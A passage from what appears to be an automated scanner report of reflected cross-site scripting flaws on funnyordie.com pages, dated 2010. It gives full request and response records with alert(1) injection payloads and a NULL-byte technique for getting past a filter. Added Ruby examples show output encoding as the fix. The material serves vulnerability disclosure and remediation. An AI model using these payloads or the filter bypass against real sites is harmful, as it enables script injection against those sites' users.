User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "6560ef23a61eeef797cbff8fb80bf3a4" X-Runtime: 341 X-Varnish: 1401118873 X-Varnish: 573896623 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:04:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 124090
1.40. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83eb2'-alert(1)-'0077d077bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_recent?83eb2'-alert(1)-'0077d077bf6=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "3bdec422851542d37440af8cc179f963"
X-Runtime: 494
X-Varnish: 1401120007
X-Varnish: 1264351883
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123369
1.41. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a6e7"-alert(1)-"babc13cf69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed?4a6e7"-alert(1)-"babc13cf69=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "451c76ce81b2b648cc20fccb7bf6cc3e"
X-Runtime: 678
X-Varnish: 1401120635
X-Varnish: 1264352773
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:05:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127247
1.42. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c81df"><script>alert(1)</script>01a6abfaf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_viewed?c81df"><script>alert(1)</script>01a6abfaf1=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "87a8d51c15a1a1eb8492e88dccbd809a"
X-Runtime: 727
X-Varnish: 1401119762
X-Varnish: 1264351582
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:05:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127965
1.43. http://www.funnyordie.com/browse/words/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39354'-alert(1)-'23bfa85a96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed?39354'-alert(1)-'23bfa85a96=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "b582204bfbfb271b2d99e3c760974d75"
X-Runtime: 303
X-Varnish: 1401120963
X-Varnish: 1264353240
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:06:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127238
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ea78'-alert(1)-'837b58acd93 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month2ea78'-alert(1)-'837b58acd93 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "4f4cfe76ae0fad871ec608268c075c30"
X-Runtime: 1229
X-Varnish: 1401169551
X-Varnish: 1264410622
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:57:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:57:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126361
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1266"><a>a95911fb8d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /browse/words/all/all/most_viewed/this_monthd1266"><a>a95911fb8d3 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "b6ae2c97b398405590da56f5e3339ddf"
X-Runtime: 1556
X-Varnish: 1401168277
X-Varnish: 573954904
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:56:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:56:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126370
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38124"-alert(1)-"9d61683ab07 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month38124"-alert(1)-"9d61683ab07 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "ea86b141ef9a0a1a30a269f250745b41"
X-Runtime: 1250
X-Varnish: 1401169237
X-Varnish: 573955932
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:57:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:57:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126557
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9175b<img%20src%3da%20onerror%3dalert(1)>8cf8fb23011 was submitted in the REST URL parameter 6. This input was echoed as 9175b<img src=a onerror=alert(1)>8cf8fb23011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. One caveat when verifying this entry: the response body shows the reflected text title-cased (<Img Src=A Onerror=Alert(1)>). HTML element and attribute names are case-insensitive, so the <img> element and its onerror handler are still created, but JavaScript identifiers are case-sensitive, so the handler body Alert(1) raises a ReferenceError rather than calling alert. The injection point is real; the handler body should be re-tested with one that survives the application's case transformation before the finding is reported as confirmed executable.
Request
GET /browse/words/all/all/most_viewed/this_month9175b<img%20src%3da%20onerror%3dalert(1)>8cf8fb23011 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "8e20bc13151459f52214dac24182eb87"
X-Runtime: 1590
X-Varnish: 1401169998
X-Varnish: 573956715
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:57:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:57:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127651
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... <h1>All Words - Most Viewed This Month9175b<Img Src=A Onerror=Alert(1)>8cf8fb23011</h1> ...[SNIP]...
1.48. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7285"><script>alert(1)</script>c06144fec6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_viewed/this_month?a7285"><script>alert(1)</script>c06144fec6d=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "06762c705a1da670b5593356cb3330c8"
X-Runtime: 661
X-Varnish: 1401119435
X-Varnish: 573897331
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127981
1.49. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 830ad"-alert(1)-"2a97fada4e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month?830ad"-alert(1)-"2a97fada4e6=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "cbecd6434fbef7d6182502f747072f75"
X-Runtime: 564
X-Varnish: 1401119885
X-Varnish: 1264351732
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:05:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127259
1.50. http://www.funnyordie.com/browse/words/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13d45'-alert(1)-'d91c512f45e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_viewed/this_month?13d45'-alert(1)-'d91c512f45e=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "ac941363e0a5f4d44f23727324325183"
X-Runtime: 592
X-Varnish: 1401120262
X-Varnish: 1264352262
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:05:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127261
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... ML = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/words/all/all/most_viewed/this_month?13d45'-alert(1)-'d91c512f45e=1"'); }); } });
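The findings above keep landing in three distinct contexts: a double-quoted HTML attribute value, a single- or double-quoted JavaScript string literal (the GA.event call in the response body above), and plain text between tags. Each needs a different output encoding, and the remediation text's point that a script context is the hardest to defend follows directly from that. The following is an added example, not code from the application or from the scanner. It is written in Ruby on the assumption, from the Rails-style X-Runtime and Status headers, that the application is a Rails stack; the template fragment, payloads and helper names are constructed to mirror the report and are not the application's real templates.

```ruby
# Added example (not from the report): context-specific output encoding for
# the three reflection contexts in these findings. The page fragment, the
# payloads and the helper names are constructed to mirror the report.
require 'erb'

# Scanner-style payloads, one per context.
ATTR_PAYLOAD = 'f250d"><script>alert(1)</script>8475e13ad'   # attribute break-out
JS_PAYLOAD   = "13d45'-alert(1)-'d91c512f45e"                 # JS string break-out
TEXT_PAYLOAD = '9175b<img src=a onerror=alert(1)>8cf8fb23011' # new tag in text

# HTML text and quoted attribute values: ERB::Util.html_escape encodes
# & < > " and ' so the value can neither close the attribute nor open a tag.
def html_encode(value)
  ERB::Util.html_escape(value)
end

# JavaScript string literal, either quote style: every non-alphanumeric
# character becomes \xHH or \uHHHH, so quotes, backslashes, newlines and the
# "</script>" sequence cannot terminate the literal or the script block.
def js_string_encode(value)
  value.each_char.map do |c|
    next c if c.match?(/[A-Za-z0-9]/)
    c.ord < 0x100 ? format('\\x%02X', c.ord) : format('\\u%04X', c.ord)
  end.join
end

# Rendering as the report describes it: the parameter name lands in the
# page text, in a double-quoted attribute and in a JS string, unencoded.
def vulnerable_page(param_name)
  url = "/browse/words/all/all/most_viewed/this_month?#{param_name}=1"
  <<~HTML
    <h1>All Words - Most Viewed #{param_name}</h1>
    <link rel="canonical" href="#{url}">
    <script>GA.event('sharing','twitter_share','#{url}');</script>
  HTML
end

# Hardened rendering: the same template, encoded per context at the point
# of output.
def hardened_page(param_name)
  url = "/browse/words/all/all/most_viewed/this_month?#{param_name}=1"
  <<~HTML
    <h1>All Words - Most Viewed #{html_encode(param_name)}</h1>
    <link rel="canonical" href="#{html_encode(url)}">
    <script>GA.event('sharing','twitter_share','#{js_string_encode(url)}');</script>
  HTML
end

# True when the reflected data stayed inside its context: no raw "<" in the
# heading text, an intact href value, and no quote or "<" inside the JS
# string literal.
def reflection_contained?(page)
  heading = page[%r{<h1>(.*?)</h1>}m, 1].to_s
  href    = page[/href="([^"]*)"/, 1].to_s
  js      = page[/'twitter_share','(.*?)'\);/m, 1].to_s
  !heading.include?('<') && !href.empty? && !js.include?("'") && !js.include?('<')
end

if __FILE__ == $PROGRAM_NAME
  [ATTR_PAYLOAD, JS_PAYLOAD, TEXT_PAYLOAD].each do |p|
    puts "#{p.inspect}: vulnerable=#{reflection_contained?(vulnerable_page(p))} " \
         "hardened=#{reflection_contained?(hardened_page(p))}"
  end
end
```

In a Rails view the equivalents are the h (ERB::Util.html_escape) and j (escape_javascript) helpers. The remediation text's stronger advice still applies: the safest option is not to place request data inside a script block at all, for example by emitting the URL in an HTML-encoded data attribute and reading it from a separate script.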
1.51. http://www.funnyordie.com/caption_contests/068afbc813/caption-contest-for-nov-2-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98851"><script>alert(1)</script>4aa15363717 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Note that the request reproduced below does not contain the %00 byte, so the bypass cannot be confirmed from this entry alone; reproduce it with the NULL byte in place before relying on it.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /caption_contests/068afbc813/caption-contest-for-nov-2-2010?98851"><script>alert(1)</script>4aa15363717=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "1ca2db5d9927de6aca39c288a16b5ac9"
X-Runtime: 233
X-Varnish: 1401142905
X-Varnish: 573925915
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:29:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:29:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241256
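The bypass described in 1.51 and its remediation note turn on one property: a filter that stops reading at the first NUL byte never sees what follows it, while the application's own parser keeps going. The following is an added example, not the application's code or any WAF vendor's: it simulates a NUL-terminated check beside a length-aware one in Ruby and shows that only encoding at the output point makes the request harmless whichever filter sits in front. The blocked-signature list, the hidden-input fragment and the two query strings are constructed for the illustration.

```ruby
# Added example (not from the report): a filter that treats NUL as a string
# terminator versus one that inspects the full byte string, and the output
# encoding that makes the difference irrelevant. All names are illustrative.
require 'cgi'
require 'erb'

# Constructed signature list standing in for whatever a WAF might block.
BLOCKED_SIGNATURES = ['<script', 'onerror=', 'javascript:'].freeze

# Models a check written in native code with C-style strings: everything
# after the first NUL byte is invisible to it.
def nul_terminated_filter_blocks?(raw_name)
  visible = raw_name.split("\0", 2).first.to_s.downcase
  BLOCKED_SIGNATURES.any? { |sig| visible.include?(sig) }
end

# Length-aware check: the NUL byte is just another byte.
def length_aware_filter_blocks?(raw_name)
  lowered = raw_name.downcase
  BLOCKED_SIGNATURES.any? { |sig| lowered.include?(sig) }
end

# Decodes parameter names from a query string; the report's findings are in
# the name of an arbitrary parameter, so only the names matter here.
def param_names(query)
  query.split('&').map { |pair| CGI.unescape(pair.split('=', 2).first) }
end

# Vulnerable rendering as the report describes it: raw interpolation into a
# double-quoted attribute value (constructed fragment).
def vulnerable_render(name)
  %(<input type="hidden" name="#{name}" value="1">)
end

# Fixed rendering: HTML-encode at the output point, whatever sat in front.
def fixed_render(name)
  %(<input type="hidden" name="#{ERB::Util.html_escape(name)}" value="1">)
end

# Runs one request through a filter and then a renderer; returns
# :blocked, :xss (a <script> tag reached the page) or :safe.
def outcome(query, filter, renderer = :vulnerable_render)
  names = param_names(query)
  return :blocked if names.any? { |n| send(filter, n) }
  html = names.map { |n| send(renderer, n) }.join
  html.include?('<script>') ? :xss : :safe
end

# Constructed requests: the 1.51 payload, with and without a leading %00.
PLAIN_QUERY  = '98851"><script>alert(1)</script>4aa15363717=1'
NULLED_QUERY = '%0098851"><script>alert(1)</script>4aa15363717=1'

if __FILE__ == $PROGRAM_NAME
  [PLAIN_QUERY, NULLED_QUERY].each do |q|
    puts "#{q.inspect}: nul-terminated=#{outcome(q, :nul_terminated_filter_blocks?)} " \
         "length-aware=#{outcome(q, :length_aware_filter_blocks?)} " \
         "fixed-app=#{outcome(q, :nul_terminated_filter_blocks?, :fixed_render)}"
  end
end
```

ERB::Util.html_escape is itself length-aware, so the NUL byte survives into the encoded attribute as an ordinary, inert character. A corrected WAF rule is still worth requesting from the vendor, but as the remediation note says it is defence in depth, not the fix.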
1.52. http://www.funnyordie.com/caption_contests/068afbc813/caption-contest-for-nov-2-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98d83"-alert(1)-"1ac830eb86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/068afbc813/caption-contest-for-nov-2-2010?98d83"-alert(1)-"1ac830eb86f=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "d7b3984ea9cb6ce77c4c34715892248e"
X-Runtime: 189
X-Varnish: 1401143556
X-Varnish: 1264380373
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:30:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:30:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241171
1.53. http://www.funnyordie.com/caption_contests/1580841283/caption-contest-for-nov-1-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a912"><script>alert(1)</script>ca9b8ea07ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /caption_contests/1580841283/caption-contest-for-nov-1-2010?8a912"><script>alert(1)</script>ca9b8ea07ba=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "12d5b27bb2918cad2ba642ea2920cbbd"
X-Runtime: 272
X-Varnish: 1401145077
X-Varnish: 1264382153
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:31:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241356
1.54. http://www.funnyordie.com/caption_contests/1580841283/caption-contest-for-nov-1-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed61b"-alert(1)-"37f17992c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /caption_contests/1580841283/caption-contest-for-nov-1-2010?ed61b"-alert(1)-"37f17992c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "dd329bc3525c1287cc809a95b42b911e"
X-Runtime: 548
X-Varnish: 1401145734
X-Varnish: 1264382898
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:32:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241215
1.55. http://www.funnyordie.com/caption_contests/da5caff1e8/caption-contest-for-nov-3-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b22c"><script>alert(1)</script>4497534b8eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /caption_contests/da5caff1e8/caption-contest-for-nov-3-2010?5b22c"><script>alert(1)</script>4497534b8eb=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "fd03060aa35ad9dae4ce3ad258d0454a"
X-Runtime: 235
X-Varnish: 1401142949
X-Varnish: 573925968
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:29:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:29:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 241690
1.56. http://www.funnyordie.com/caption_contests/da5caff1e8/caption-contest-for-nov-3-2010 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f857b"-alert(1)-"259522f8ca9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
